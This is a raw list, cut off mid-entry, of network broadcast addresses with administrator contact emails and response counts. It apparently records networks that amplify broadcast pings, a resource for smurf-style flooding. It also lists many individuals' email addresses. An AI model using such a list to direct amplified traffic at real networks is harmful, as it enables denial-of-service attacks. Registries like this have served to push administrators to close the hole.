194.235.65.255 coen@microhill.nl, jasper@webcity.nl 610 192.114.6.255 hank@isoc.org.il 610 194.254.164.255 florence@upn.univ-paris13.fr 492 209.51.241.255 dhoyt@hoyt.com 476 206.228.251.255 tarvid@ls.net 457 203.17.162.255 hostmaster@telstra.net 453 199.57.108.0 HOSTMASTER@nic.mil 400 24.48.8.255 hostmaster@adelphia.net 391 24.48.10.255 hostmaster@adelphia.net 387 199.57.108.255 HOSTMASTER@nic.mil 366 208.243.102.255 dave@mva.net 351 204.117.176.255 colin.dykstra@solect.com 328 209.51.241.0 dhoyt@hoyt.com 316 209.3.78.255 noc@iconnet.net 298 208.167.166.255 robert@madole.org 286 210.62.19.255 pywang@ignmail.gcn.net.tw, eric1107@gcn.net.tw 248 207.171.247.255 domain@slip.net 248 208.200.208.255 nomailbox@nowhere 245 208.0.173.0 georges@abbasys.com 244 216.96.82.0 dw498h20@lx.netcom.com 244 210.230.65.0 hostmaster@nic.ad.jp 243 24.48.14.255 hostmaster@adelphia.net 242 210.230.69.255 hostmaster@nic.ad.jp 235 203.17.162.0 hostmaster@telstra.net 234 192.115.90.0 hank@isoc.org.il 234 210.164.32.0 hostmaster@nic.ad.jp 234 206.228.251.0 tarvid@ls.net 212 204.117.176.0 colin.dykstra@solect.com 211 194.52.151.255 leifl@etforlag.se 211 209.20.39.255 netadmin@interlog.net 208 206.55.18.0 nic@monumental.com 207 194.52.151.0 leifl@etforlag.se 203 192.115.90.255 hank@isoc.org.il 198 208.167.166.0 robert@madole.org 193 208.32.150.255 DONL@webventures.com 188 207.138.177.0 snvnoc@globalcenter.net 186 216.28.108.255 tstroup@fnsi.net 174 209.83.78.255 admin@norlight.net 171 206.55.18.255 nic@monumental.com 171 207.138.177.255 snvnoc@globalcenter.net 169 206.0.150.255 hostinfo@psi.com 164 209.110.66.0 Louis_Lee@icgcomm.com 161 192.107.99.0 bardotti@frascati.enea.it 154 24.129.52.255 help@mediaone.net 154 199.251.99.0 lind@forum.saic.com 142 209.83.78.0 admin@norlight.net 139 206.175.50.0 tech@netwalk.com 137 208.32.150.0 DONL@webventures.com 134 209.110.66.255 Louis_Lee@icgcomm.com 133 206.215.156.0 wbm@travelx.com 133 206.215.156.255 wbm@travelx.com 125 199.250.180.255 dnstech@eni.net 125 208.248.240.255 nomailbox@nowhere 125 216.26.26.0 hostmaster@teleport.com 125 216.26.26.255 hostmaster@teleport.com 124 209.212.162.255 hostmaster@rhythms.net 124 208.219.170.255 help@uunet.uu.net 124 208.236.130.255 mckee@admin.infoave.net 124 208.29.221.255 scott@thrifty.net 123 194.159.37.255 postmaster@infosys.co.uk 123 206.114.7.255 ovanegas@dns1.americatel.net.co 123 208.195.250.255 nomailbox@nowhere 123 209.84.88.255 ipadmin@gte.net 123 208.170.100.255 mderrick@hiwaay.net 123 208.0.173.255 georges@abbasys.com 122 147.229.67.255 slama@cis.vutbr.cs 122 198.243.122.255 bgardner@qwest.net 122 202.96.106.255 dmkou@publicf.bta.net.cn 122 204.214.111.255 tim@harborside.com 122 207.202.127.255 noc@corp.idt.net 122 207.241.14.255 info@cbcast.com 122 208.237.81.255 sitemaster@exploremaine.com 122 208.199.248.255 nomailbox@nowhere 122 209.46.15.255 hostmaster@gofast.net 121 198.243.54.0 sid@meph.soma.com 121 202.102.138.255 dmkou@publicf.bta.net.cn, zxf@pub.sd.cninfo.net 121 205.200.232.255 patrick@escape.ca 121 207.175.201.255 ipadmin@gte.net 121 210.169.80.0 hostmaster@nic.ad.jp 121 216.46.204.255 hostmaster@pathwaynet.com 120 194.2.21.255 jmp@oleane.net, rol@oleane.net 120 195.184.38.255 hein@euroconnect.net 120 195.242.60.255 sussie@mbox302.swipnet.se, vincent.mejlak@swipnet.se 120 195.8.107.255 loco@globalcenter.net 120 202.98.5.255 dmkou@publicf.bta.net.cn, yzxu@publicf.bta.net.cn 120 204.251.48.255 NOC@sprint.net 119 24.129.31.255 help@mediaone.net 119 199.170.203.255 jfarmer@goldsword.com 119 202.103.6.255 dmkou@publicf.bta.net.cn, dx@hbdcb.net.cn 119 204.171.186.0 sysop@dp.net 119 216.16.22.255 sysadmin@dtg.com 118 195.224.162.0 nic@gxn.net, j_davis@wandsworth.gov.uk 118 199.94.214.255 ops@bbnplanet.com 118 202.208.82.255 technical@apnic.net 118 210.132.164.255 hostmaster@nic.ad.jp 117 210.164.32.255 hostmaster@nic.ad.jp 115 194.27.141.255 115 207.235.88.255 rickyc@world-net.net 114 62.156.149.0 egerding@04.dssd2.telekom400.dbp.de, udo.altmann@telekom.de 114 194.121.100.255 softinfo@softline.de, kf@ilk.de 113 199.78.32.0 nomailbox@nowhere 111 199.78.32.255 nomailbox@nowhere 108 206.104.113.255 nomailbox@nowhere 108 209.115.108.255 tstroup@fnsi.net 105 216.69.2.255 jrapier@mail.state.ky.us 102 210.118.83.0 mgr@samsung.co.kr, ip@samsung.co.kr 101 209.3.168.255 98 208.138.60.0 txa@source.net 98 208.138.60.255 txa@source.net 98 208.167.167.0 robert@madole.org 96 204.96.179.255 dnsadmin@sig.net 96 208.155.35.255 andy@mtco.com 95 204.96.179.0 dnsadmin@sig.net 95 207.108.124.0 dns-info@uswest.net 93 204.179.196.0 postmaster@chomp.com 91 208.161.128.255 tmalone@kalliance.com 90 63.66.121.255 billk@silverplatter.com 89 207.108.124.255 dns-info@uswest.net 88 207.193.253.0 hostmaster@swbell.net 88 207.193.253.255 hostmaster@swbell.net 86 198.188.162.0 nes@4c.net 86 208.239.162.255 nomailbox@nowhere 86 208.157.193.255 Jamie@wcitx.com 85 203.93.41.255 85 210.118.83.255 mgr@samsung.co.kr, ip@samsung.co.kr 84 208.239.162.0 nomailbox@nowhere 82 63.66.121.0 billk@silverplatter.com 82 199.251.99.255 lind@forum.saic.com 82 204.97.93.0 sbriggs@i-2000.com 82 204.97.93.255 sbriggs@i-2000.com 82 206.101.244.255 nomailbox@nowhere 82 206.127.232.255 gmosier@pixi.com 82 206.127.239.255 gmosier@pixi.com 82 208.228.42.0 bkressman@netexplorer.com 82 208.228.42.255 bkressman@netexplorer.com 81 199.227.202.255 netadm@gate.net 81 209.232.130.255 ip-admin@pbi.net 80 202.96.108.255 dmkou@publicf.bta.net.cn 77 216.111.249.255 RTHEIGE@adforce.com 77 208.129.11.255 sundog@coop.crn.org 76 159.66.142.0 robertb@coop.com 76 202.230.181.255 hostmaster@nic.ad.jp 76 204.243.120.255 hostinfo@psi.com 76 206.141.74.255 lak@aads.net 75 212.213.47.0 Tapani.Heinonen@Sonera.fi, Valtteri.Karu@Sonera.fi 75 208.6.8.0 admin@penn.com 75 208.6.8.255 admin@penn.com 74 216.111.248.0 RTHEIGE@adforce.com 74 206.5.130.255 hostinfo@psi.com 72 159.66.148.0 robertb@coop.com 72 159.66.148.255 robertb@coop.com 72 194.225.3.255 pourpak@irearn.bitnet, nowzari@ipm.ac.ir, nowzari@irearn.bitnet, parsaei@irearn.bitnet, sarrami@ece.ut.ac.ir, ahrabian@irearn.bitnet 72 199.227.200.255 netadm@gate.net 72 212.213.44.255 Tapani.Heinonen@Sonera.fi, Valtteri.Karu@Sonera.fi 71 159.66.144.255 robertb@coop.com 71 159.66.158.0 robertb@coop.com 71 212.213.47.255 Tapani.Heinonen@Sonera.fi, Valtteri.Karu@Sonera.fi 71 209.0.233.0 ipadmin@level3.net 70 195.224.243.255 nic@gxn.net, asm@gxn.net 70 210.75.128.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 70 210.75.128.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 69 159.66.147.255 robertb@coop.com 69 206.141.74.0 lak@aads.net 69 209.38.146.255 dnsadmin@rmi.net 68 206.217.87.255 power@tool.net 67 195.224.242.0 nic@gxn.net, asm@gxn.net 67 212.213.44.0 Tapani.Heinonen@Sonera.fi, Valtteri.Karu@Sonera.fi 67 206.43.93.255 muzdzign@cnct.com 66 204.179.196.255 postmaster@chomp.com 65 210.131.77.0 hostmaster@nic.ad.jp 64 159.66.145.0 robertb@coop.com 63 192.50.75.0 matsui@etl.go.jp 63 209.234.209.0 jkerrey@gstworld.net 62 209.233.219.0 ip-admin@pbi.net 61 204.71.242.0 smantel@pathfinder.com 61 204.71.242.255 smantel@pathfinder.com 60 207.152.126.0 Postmaster@popmail.jba.com 60 207.152.126.255 Postmaster@popmail.jba.com 60 210.84.0.255 net-ops@list.ozemail.com.au 59 205.187.155.0 root@fontana.k12.ca.us 59 208.149.229.255 timls@srttel.com 58 193.13.151.0 58 204.217.194.0 hostinfo@psi.com 58 205.253.196.255 karl@mcs.com 58 206.217.87.0 power@tool.net 58 207.123.253.0 mullauer@umms-itg.ab.umd.edu 58 207.215.237.0 dennis@globalpac.com 57 193.13.151.255 57 195.156.92.0 janne.tiuttu@cimcorp.fi, paavo.ranta@cimcorp.fi 57 209.254.66.0 netadmin@splitrock.net 57 209.252.154.0 netadmin@splitrock.net 57 209.254.66.255 netadmin@splitrock.net 57 209.252.155.255 netadmin@splitrock.net 57 209.253.94.0 netadmin@splitrock.net 57 209.253.240.0 netadmin@splitrock.net 57 209.252.151.0 netadmin@splitrock.net 57 209.253.243.255 netadmin@splitrock.net 57 209.253.95.255 netadmin@splitrock.net 57 209.252.151.255 netadmin@splitrock.net 56 134.241.250.0 hostmaster@umassp.edu 56 199.178.64.0 hostmaster@ameritech.net 56 204.217.194.255 hostinfo@psi.com 56 216.102.167.0 ip-admin@pbi.net 56 206.66.243.0 daniel@webdimensions.com 56 206.5.130.0 hostinfo@psi.com 56 206.231.65.255 NOC@sprint.net 55 198.188.168.0 nes@4c.net 55 204.253.190.0 direwolf@shout.net 55 204.253.190.255 direwolf@shout.net 55 207.213.205.255 andy@ssw1.com 55 216.20.92.0 jcoco@mec.edu 54 194.225.3.0 nowzari@ipm.ac.ir, sarrami@ece.ut.ac.ir 54 198.129.74.255 hostmaster@es.net 54 199.227.200.0 netadm@gate.net 54 205.138.94.255 54 207.123.252.0 mullauer@umms-itg.ab.umd.edu 54 209.73.88.255 hostmaster@digilink.net 53 167.199.95.0 jda51@state.ga.us 53 192.104.183.0 gower@howpubs.com 53 193.15.102.0 53 193.15.102.255 53 194.167.0.0 sygnet@iap.fr, grenet@iap.fr 53 195.156.126.0 53 204.222.10.255 53 204.222.11.0 53 204.96.225.255 marcy@rain.org 52 199.238.157.0 hostmaster@arin.net 52 209.61.8.255 fredl@tiac.net 51 140.249.40.255 jjackson@wpine.com 51 159.66.144.0 robertb@coop.com 51 161.223.41.0 51 161.223.41.255 51 203.238.128.255 mgr@nownuri.net, ip@nownuri.net 51 204.96.225.0 marcy@rain.org 51 205.171.32.0 hostmaster@csn.net 50 195.145.123.0 lick@ron.de 50 198.129.74.0 hostmaster@es.net 50 198.97.78.255 postmaster@algo.net 50 207.123.252.255 mullauer@umms-itg.ab.umd.edu 50 209.251.172.0 mczakaria@chartercom.com 50 209.251.172.255 mczakaria@chartercom.com 49 152.12.1.255 tallen@ramsun.acc.wssu.edu 49 192.104.183.255 gower@howpubs.com 49 193.91.202.0 49 195.182.162.255 r.jamieson@dccl.net, y.cheung@dccl.net, c.heald@dccl.net 49 198.64.22.255 hostmaster@sesqui.net 49 207.132.232.0 HOSTMASTER@nic.mil 49 207.115.60.255 harrycw@prodigy.net 49 208.146.145.255 brennick@wharvest.com 49 209.175.160.0 wdahlen@mail.isbe.state.il.us 49 209.27.160.255 hostmaster@idci.net 48 140.249.40.0 jjackson@wpine.com 48 143.213.130.255 MILLARDD@shafter-emh3.army.mil 48 161.223.42.0 48 204.152.57.0 allen.arthur@oak.doe.gov 48 204.222.10.0 48 206.162.52.255 admin@dx.net 48 207.90.230.255 dnsmaster@infohwy.com 48 216.64.151.255 hostmaster@gsti.net 48 209.175.160.255 wdahlen@mail.isbe.state.il.us 48 208.155.35.0 andy@mtco.com 48 209.73.236.255 hostmaster@pfmc.net 48 209.27.160.0 hostmaster@idci.net 47 140.239.57.255 hostmaster@harvard.net 47 143.213.200.255 MILLARDD@shafter-emh3.army.mil 47 195.81.0.0 jan@ixe.net, arno@ixe.net 47 205.187.155.255 root@fontana.k12.ca.us 47 216.111.166.0 noc@qwest.net 47 216.50.108.0 technical@kivex.com 47 208.146.145.0 brennick@wharvest.com 47 209.175.161.0 wdahlen@mail.isbe.state.il.us 46 161.223.42.255 46 203.238.128.0 mgr@nownuri.net, ip@nownuri.net 46 206.129.187.0 dns-admin@ixa.net 46 207.121.206.255 rtharp@gcts.edu 46 209.145.131.255 noc@accessus.net 46 209.208.248.0 hostmaster@pfmc.net 46 209.87.67.255 services@virtualpro.com 45 192.116.146.0 hank@isoc.org.il 45 192.70.104.255 Annie.Renard@inria.fr 45 194.140.169.255 ramon.recio@tecsidel.es, jordiar@cinet.es 45 194.140.170.255 ramon.recio@tecsidel.es 45 198.64.21.0 hostmaster@sesqui.net 45 204.228.78.0 cgarner@sni.net 45 206.129.141.0 nikm@cyberflunk.com 45 206.129.141.255 nikm@cyberflunk.com 45 206.170.59.255 dnsadmin@pbi.net 45 210.131.76.0 hostmaster@nic.ad.jp 45 207.203.95.0 ipadmin@bellsouth.net 45 207.215.237.255 dennis@globalpac.com 45 209.145.131.0 noc@accessus.net 45 206.75.155.255 swip@istar.ca 45 209.98.40.255 drechsau@geeks.org 45 210.94.51.0 wkim@nca.or.kr, syha@rs.krnic.net, yuppie@nic.or.kr 45 210.94.51.255 wkim@nca.or.kr, syha@rs.krnic.net, yuppie@nic.or.kr 44 202.251.136.255 hostmaster@nic.ad.jp 44 204.27.91.0 n@nectar.com 44 204.84.29.255 hostmaster@ncren.net 44 205.147.142.0 noc@corp.idt.net 44 205.147.142.255 noc@corp.idt.net 44 205.164.166.255 mjg@writeme.com 44 205.185.157.0 Louis_Lee@icgcomm.com 44 205.185.157.255 Louis_Lee@icgcomm.com 44 205.198.253.0 markg@hkusa.com 44 206.141.16.0 lak@aads.net 44 206.148.55.0 dnr@spacelab.net 44 206.155.91.0 admin@lisco.com 44 207.244.127.0 ljg@shore.net 44 207.244.127.255 ljg@shore.net 44 216.98.157.0 ray_25@yahoo.com 44 206.75.155.0 swip@istar.ca 43 148.83.7.255 43 152.30.20.0 mckenzie@wcuvax1.wcu.edu 43 152.30.20.255 mckenzie@wcuvax1.wcu.edu 43 194.16.2.0 stefan@netch.se 43 198.64.44.0 hostmaster@sesqui.net 43 200.129.158.0 gomide@nic.br 43 204.254.80.0 keith@dcna.com 43 209.208.227.0 hostmaster@pfmc.net 43 207.121.206.0 rtharp@gcts.edu 43 209.3.130.0 wkrug@atlnet.org 42 194.148.1.0 afink@pingnet.ch 42 200.129.158.255 gomide@nic.br 42 202.78.157.255 ken@clearview.co.nz, bobg@clearview.co.nz 42 204.130.68.0 42 204.130.68.255 42 204.57.162.0 chrismur@overlake.org 42 204.57.162.255 chrismur@overlake.org 42 204.84.31.0 hostmaster@ncren.net 42 207.213.205.0 andy@ssw1.com 42 207.203.95.255 ipadmin@bellsouth.net 42 207.123.250.0 mullauer@umms-itg.ab.umd.edu 42 207.90.230.0 dnsmaster@infohwy.com 42 206.66.243.255 daniel@webdimensions.com 42 208.192.231.255 noc@interactive.net 42 216.51.59.255 technical@kivex.com 41 63.66.135.255 nobody@uu.net 41 192.207.9.255 tom@server1.angus.com 41 193.91.202.255 41 198.211.230.0 shaver@healthcare.com 41 199.94.18.0 newhall@noc.harvard.edu 41 199.94.18.255 newhall@noc.harvard.edu 41 200.46.63.255 admin@sinfo.net 41 204.168.184.0 bill.russell@nyu.edu 41 204.27.91.255 n@nectar.com 41 204.84.30.255 hostmaster@ncren.net 41 204.97.19.0 hostmaster@top.monad.net 41 205.247.10.255 sbriggs@i-2000.com 41 206.233.90.255 hostinfo@psi.com 41 210.165.39.255 hostmaster@nic.ad.jp 41 206.231.62.0 hagen@meol.mass.edu 41 206.231.62.255 hagen@meol.mass.edu 41 208.236.180.0 martyr@acr.org 41 208.192.231.0 noc@interactive.net 40 143.43.204.0 D-Romano@wiu.edu 40 143.43.205.255 D-Romano@wiu.edu 40 192.239.137.0 pete@rayleigh.tt.aftac.gov 40 192.239.137.255 pete@rayleigh.tt.aftac.gov 40 194.167.120.0 yves.prague@u-bordeaux2.fr 40 195.18.119.0 marcel@nl.gxn.net, stefan@nl.gxn.net, hans@nl.gxn.net 40 195.18.119.255 marcel@nl.gxn.net, stefan@nl.gxn.net, hans@nl.gxn.net 40 199.108.184.0 dns@cerf.net 40 200.20.94.0 gomide@nic.br 40 204.84.30.0 hostmaster@ncren.net 40 204.84.31.255 hostmaster@ncren.net 40 205.213.128.255 frcr@ltc.tec.wi.us 40 205.213.133.255 frcr@ltc.tec.wi.us 40 206.148.251.0 noc@mwci.net 40 206.148.251.255 noc@mwci.net 40 206.157.67.255 abettsak@sinfo.net 40 206.157.68.0 abettsak@sinfo.net 40 209.64.2.255 info@netradio.net 40 206.27.80.0 abettsak@sinfo.net 40 208.140.202.255 admin@sinfo.net 40 209.137.126.0 hostmaster@icix.net 40 207.49.79.0 abettsak@sinfo.net 39 148.83.4.0 39 194.8.193.0 mruesel@netcologne.de, akb@netcologne.de, jsommerberg@netcologne.de 39 195.145.123.255 lick@ron.de 39 200.17.53.0 gomide@nic.br 39 203.139.106.255 hostmaster@nic.ad.jp 39 203.179.212.255 hostmaster@nic.ad.jp 39 204.179.253.0 dpinder@appliedcom.com 39 204.179.253.255 dpinder@appliedcom.com 39 204.84.29.0 hostmaster@ncren.net 39 204.88.64.0 39 204.97.19.255 hostmaster@top.monad.net 39 205.221.193.0 rparis@ihcc.cc.ia.us 39 206.157.64.0 abettsak@sinfo.net 39 209.133.61.255 noc@above.net 39 208.237.105.0 rwilhe@luk-us.com 39 208.152.187.0 stokes@aris.net 39 208.152.187.255 stokes@aris.net 39 208.3.167.255 nomailbox@nowhere 39 208.201.184.0 nomailbox@nowhere 38 63.64.107.0 jshelnutt@ispalliance.net 38 63.64.107.255 jshelnutt@ispalliance.net 38 192.239.136.0 pete@rayleigh.tt.aftac.gov 38 192.239.136.255 pete@rayleigh.tt.aftac.gov 38 193.128.20.0 38 193.128.21.0 38 193.128.21.255 38 193.6.21.255 net-admin@sztaki.hu, dns-admin@hungarnet.hu 38 198.64.21.255 hostmaster@sesqui.net 38 198.64.22.0 hostmaster@sesqui.net 38 199.244.182.0 38 200.16.176.0 nomailbox@nowhere 38 202.251.136.0 hostmaster@nic.ad.jp 38 204.116.225.0 38 204.116.225.255 38 204.116.226.0 38 204.116.226.255 38 204.116.33.0 richard.colgate@sunbelt.net 38 204.116.33.255 richard.colgate@sunbelt.net 38 206.126.151.255 pete@altadena.net 38 208.218.96.0 mitch@gvtc.com 38 208.218.97.0 mitch@gvtc.com 38 208.218.96.255 mitch@gvtc.com 38 207.177.41.0 noc@netins.net 38 207.177.41.255 noc@netins.net 38 209.85.102.0 hostmaster@softaware.com 38 209.85.103.255 jweis@softaware.com 38 207.67.228.255 Dave@pacificcolor.com 38 207.196.111.0 hostmaster@clark.net 38 207.224.201.0 dlongar@uswest.net 38 209.64.2.0 info@netradio.net 38 206.206.103.255 Beeson@technet.nm.org 38 209.175.161.255 wdahlen@mail.isbe.state.il.us 38 206.176.39.0 sbrost@mystic.bhsu.edu 38 206.176.39.255 sbrost@mystic.bhsu.edu 38 206.191.216.255 nomailbox@nowhere 37 193.128.20.255 37 193.188.61.255 kha@knpc.com.kw, hmb@knpc.com.kw 37 195.20.88.0 103023.2047@compuserve.com, hostmaster@OMNILINK.NET 37 195.20.88.255 hostmaster@omnilink.net, 103023.2047@compuserve.com 37 195.38.102.255 thomas@tvnet.hu, adi@tvnet.hu 37 199.244.182.255 37 203.238.129.255 mgr@nownuri.net, ip@nownuri.net 37 204.254.80.255 keith@dcna.com 37 204.48.142.255 tuma@ceo.sbceo.k12.ca.us 37 204.48.223.0 tuma@ceo.sbceo.k12.ca.us 37 204.69.110.255 wong@accesscom.net 37 205.223.148.255 dale@roadrunner.admin.leon.k12.fl.us 37 207.123.253.255 mullauer@umms-itg.ab.umd.edu 37 207.67.228.0 Dave@pacificcolor.com 37 206.191.225.0 hostmaster@spacestar.net 37 216.101.17.0 cpuccetti@advmedicine.com 37 207.214.141.255 kgibbs@porterville.k12.ca.us 37 209.163.146.0 37 206.206.103.0 Beeson@technet.nm.org 37 208.237.105.255 rwilhe@luk-us.com 37 210.84.0.0 net-ops@list.ozemail.com.au 37 209.3.41.0 noc@iconnet.net 37 209.201.116.0 support@iconnet.net 37 209.3.40.255 noc@iconnet.net 37 209.201.116.255 support@iconnet.net 37 209.201.119.255 support@iconnet.net 37 216.168.235.0 cwei@netsol.com 37 216.168.235.255 cwei@netsol.com 37 209.144.168.255 ggillespie@currents.net 37 216.12.37.255 dns@cfw.com 37 209.149.248.0 ipadmin@bellsouth.net 37 209.240.85.0 mury@goldengate.net 37 209.240.85.255 mury@goldengate.net 37 208.2.250.255 nomailbox@nowhere 36 193.0.84.0 Marcin.Gromisz@fuw.edu.pl, Michal.Jankowski@fuw.edu.pl 36 194.68.198.0 36 199.105.221.0 dns@cerf.net 36 199.178.74.0 hostmaster@ameritech.net 36 202.99.41.0 36 202.99.48.0 36 202.99.48.255 36 204.181.85.255 jbuchle@staktek.com 36 204.211.80.0 hostmaster@sips.state.nc.us 36 204.228.78.255 cgarner@sni.net 36 204.69.110.0 wong@accesscom.net 36 205.138.50.0 ipswip@cw.net 36 205.138.50.255 ipswip@cw.net 36 205.213.134.255 frcr@ltc.tec.wi.us 36 205.213.135.255 frcr@ltc.tec.wi.us 36 205.253.192.0 karl@mcs.com 36 205.253.192.255 karl@mcs.com 36 212.48.2.255 carlo.gualandri@matrix.it, melli@matrix.it 36 207.13.165.255 NOC@sprint.net 36 207.214.141.0 kgibbs@porterville.k12.ca.us 36 210.208.167.0 tonyyuan@mail.my.net.tw 36 216.88.175.0 scotts@blairlake.com 36 210.208.167.255 tonyyuan@mail.my.net.tw 36 210.78.152.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.153.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.158.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.152.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.153.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.154.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.155.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.158.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 216.94.82.255 nhermes@adexpress.ca 36 207.66.244.0 pat@wolfe.net 36 209.201.118.0 support@iconnet.net 36 209.201.118.255 support@iconnet.net 36 207.13.164.255 NOC@sprint.net 36 209.149.248.255 ipadmin@bellsouth.net 36 209.152.141.255 domain@slip.net 35 192.160.217.255 greenup@whittier.edu 35 192.174.35.0 35 192.204.204.0 jacobs@mail.dp.upenn.edu 35 192.204.204.255 jacobs@mail.dp.upenn.edu 35 194.57.84.0 Patrice.Koch@univ-fcomte.fr 35 195.90.31.255 guardian@isb.net, nerge@isb.net 35 199.186.145.255 hostmaster@attmail.com 35 200.17.53.255 gomide@nic.br 35 200.25.18.0 lcgomez@b-manga.cetcol.net.co 35 204.0.135.255 hostmaster@sesqui.net 35 204.254.150.0 postmaster@arn.net 35 204.254.150.255 postmaster@arn.net 35 204.48.142.0 tuma@ceo.sbceo.k12.ca.us 35 204.48.223.255 tuma@ceo.sbceo.k12.ca.us 35 205.164.166.0 mjg@writeme.com 35 205.213.128.0 frcr@ltc.tec.wi.us 35 205.213.132.0 frcr@ltc.tec.wi.us 35 205.213.135.0 frcr@ltc.tec.wi.us 35 206.0.199.255 hostinfo@psi.com 35 207.163.229.255 hostmaster@alameda-coe.k12.ca.us 35 207.13.164.0 NOC@sprint.net 35 207.214.142.255 kgibbs@porterville.k12.ca.us 35 207.123.250.255 mullauer@umms-itg.ab.umd.edu 35 207.25.98.0 noc@ans.net 35 207.10.165.0 rcm@mmc.marymt.edu 35 210.208.166.0 tonyyuan@mail.my.net.tw 35 207.10.165.255 rcm@mmc.marymt.edu 35 210.78.154.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 35 210.78.155.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 35 210.78.159.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 35 207.136.233.0 topher@madriver.com 35 206.247.11.255 rkd@rmi.net 35 216.214.168.255 noc@megsinet.net 35 216.64.150.255 hostmaster@gsti.net 35 216.84.9.0 netadmin@southernet.net 35 209.85.170.0 hostmaster@softaware.com 35 209.85.170.255 hostmaster@softaware.com 35 207.13.165.0 NOC@sprint.net 35 209.163.147.255 alan@waldenweb.com 35 209.39.59.0 netadmin@onramp.net 34 24.217.1.255 mczakaria@chartercom.com 34 152.3.144.255 rdc@netcom.duke.edu 34 192.173.9.0 gandrews@drc.com 34 193.252.125.255 postmaster@wanadoo.fr, abuse@wanadoo.fr, Sylvain.Causse@wanadoo.com 34 195.202.143.0 herbert.voegl@kabsi.at, chris@streams.at, christian.steger@indis.at 34 195.90.31.0 guardian@isb.net, nerge@isb.net 34 198.188.181.0 nes@4c.net 34 199.119.8.255 http://103536.3617@compuserve.com 34 202.78.157.0 ken@clearview.co.nz, bobg@clearview.co.nz 34 203.155.160.0 chatree@ram1.ru.ac.th, admin@ns.ksc.co.th 34 203.95.7.255 zao@stn.sh.cn, sqian@fudan.edu.cn 34 205.152.12.255 ipadmin@bellsouth.net 34 205.169.211.0 postmaster@garfield.k12.co.us 34 205.213.132.255 frcr@ltc.tec.wi.us 34 205.216.169.0 sei@vidpbx.com 34 205.216.169.255 sei@vidpbx.com 34 209.63.149.255 cbrown@advanced-power.com 34 207.163.229.0 hostmaster@alameda-coe.k12.ca.us 34 212.48.2.0 carlo.gualandri@matrix.it, melli@matrix.it 34 208.154.15.255 ron@syrworldnet.com 34 207.149.39.255 brett@pond.net 34 208.154.15.0 ron@syrworldnet.com 34 207.214.142.0 kgibbs@porterville.k12.ca.us 34 207.100.159.0 hostmaster@icix.net 34 216.214.168.0 noc@megsinet.net 34 209.3.130.255 wkrug@atlnet.org 34 209.132.105.0 garyq@wpds.com 34 209.167.171.255 chris@tntech.com 34 209.152.182.255 domain@slip.net 34 209.144.168.0 ggillespie@currents.net 34 208.225.130.255 lbutrick@awr.com 34 209.135.222.255 mromm@kivex.com 33 24.66.63.0 internet.abuse@shaw.ca 33 152.3.144.0 rdc@netcom.duke.edu 33 198.97.78.0 postmaster@algo.net 33 199.103.248.0 dnsmaster@terra.net 33 202.102.30.0 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 33 202.102.30.255 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 33 203.127.167.0 33 203.127.167.255 33 204.130.67.255 33 204.152.57.255 allen.arthur@oak.doe.gov 33 204.186.98.255 dns-request@ptd.net 33 204.192.47.0 noc@digex.net 33 204.32.135.0 Louis_Lee@icgcomm.com 33 204.32.135.255 Louis_Lee@icgcomm.com 33 205.165.50.0 RIDDLE@twu.edu 33 205.165.50.255 RIDDLE@twu.edu 33 205.230.191.0 bob@new-york.net 33 206.0.199.0 hostinfo@psi.com 33 206.141.16.255 lak@aads.net 33 206.148.48.255 Wong@callaway.com 33 207.149.39.0 brett@pond.net 33 210.17.1.0 dengwei@access.ttn.com.tw 33 216.103.204.0 ip-admin@pbi.net 33 209.233.209.0 ip-admin@pbi.net 33 209.80.138.0 tom_plati@wellesley.mec.edu 33 207.100.159.255 hostmaster@icix.net 33 216.103.205.255 ip-admin@pbi.net 33 209.149.4.0 ipadmin@bellsouth.net 33 207.109.43.0 dns-info@uswest.net 33 207.16.219.255 help@uunet.uu.net 33 209.201.119.0 support@iconnet.net 33 209.47.228.0 chris@tntech.com 33 216.88.175.255 scotts@blairlake.com 33 207.96.71.0 domreg@erols.com 33 208.158.116.0 nomailbox@nowhere 32 63.65.8.255 twright@cathedral.org 32 140.237.20.0 lauer@merl.com 32 140.237.20.255 lauer@merl.com 32 192.211.32.255 sawise@mindspring.com, wise@widedata.com 32 194.229.106.0 32 194.78.210.0 jfs@skynet.be 32 194.78.210.255 jfs@skynet.be 32 194.78.211.0 jfs@skynet.be 32 194.78.211.255 jfs@skynet.be 32 195.232.126.0 hostmaster@wcom.net 32 198.142.200.255 matt@mpx.com.au 32 198.6.49.0 aperry@symantec.com 32 198.6.49.255 aperry@symantec.com 32 199.186.145.0 hostmaster@attmail.com 32 199.98.170.255 hostinfo@psi.com 32 200.132.7.255 gomide@nic.br 32 203.155.175.255 chatree@ram1.ru.ac.th, admin@ns.ksc.co.th 32 204.130.67.0 32 204.130.69.0 32 204.220.140.0 hostmaster@computerpro.com 32 204.220.140.255 hostmaster@computerpro.com 32 204.220.141.0 hostmaster@computerpro.com 32 204.220.141.255 hostmaster@computerpro.com 32 204.220.142.0 nomailbox@nowhere 32 204.220.142.255 nomailbox@nowhere 32 205.211.53.255 teha@algonquinc.on.ca 32 206.17.97.0 dns@cerf.net 32 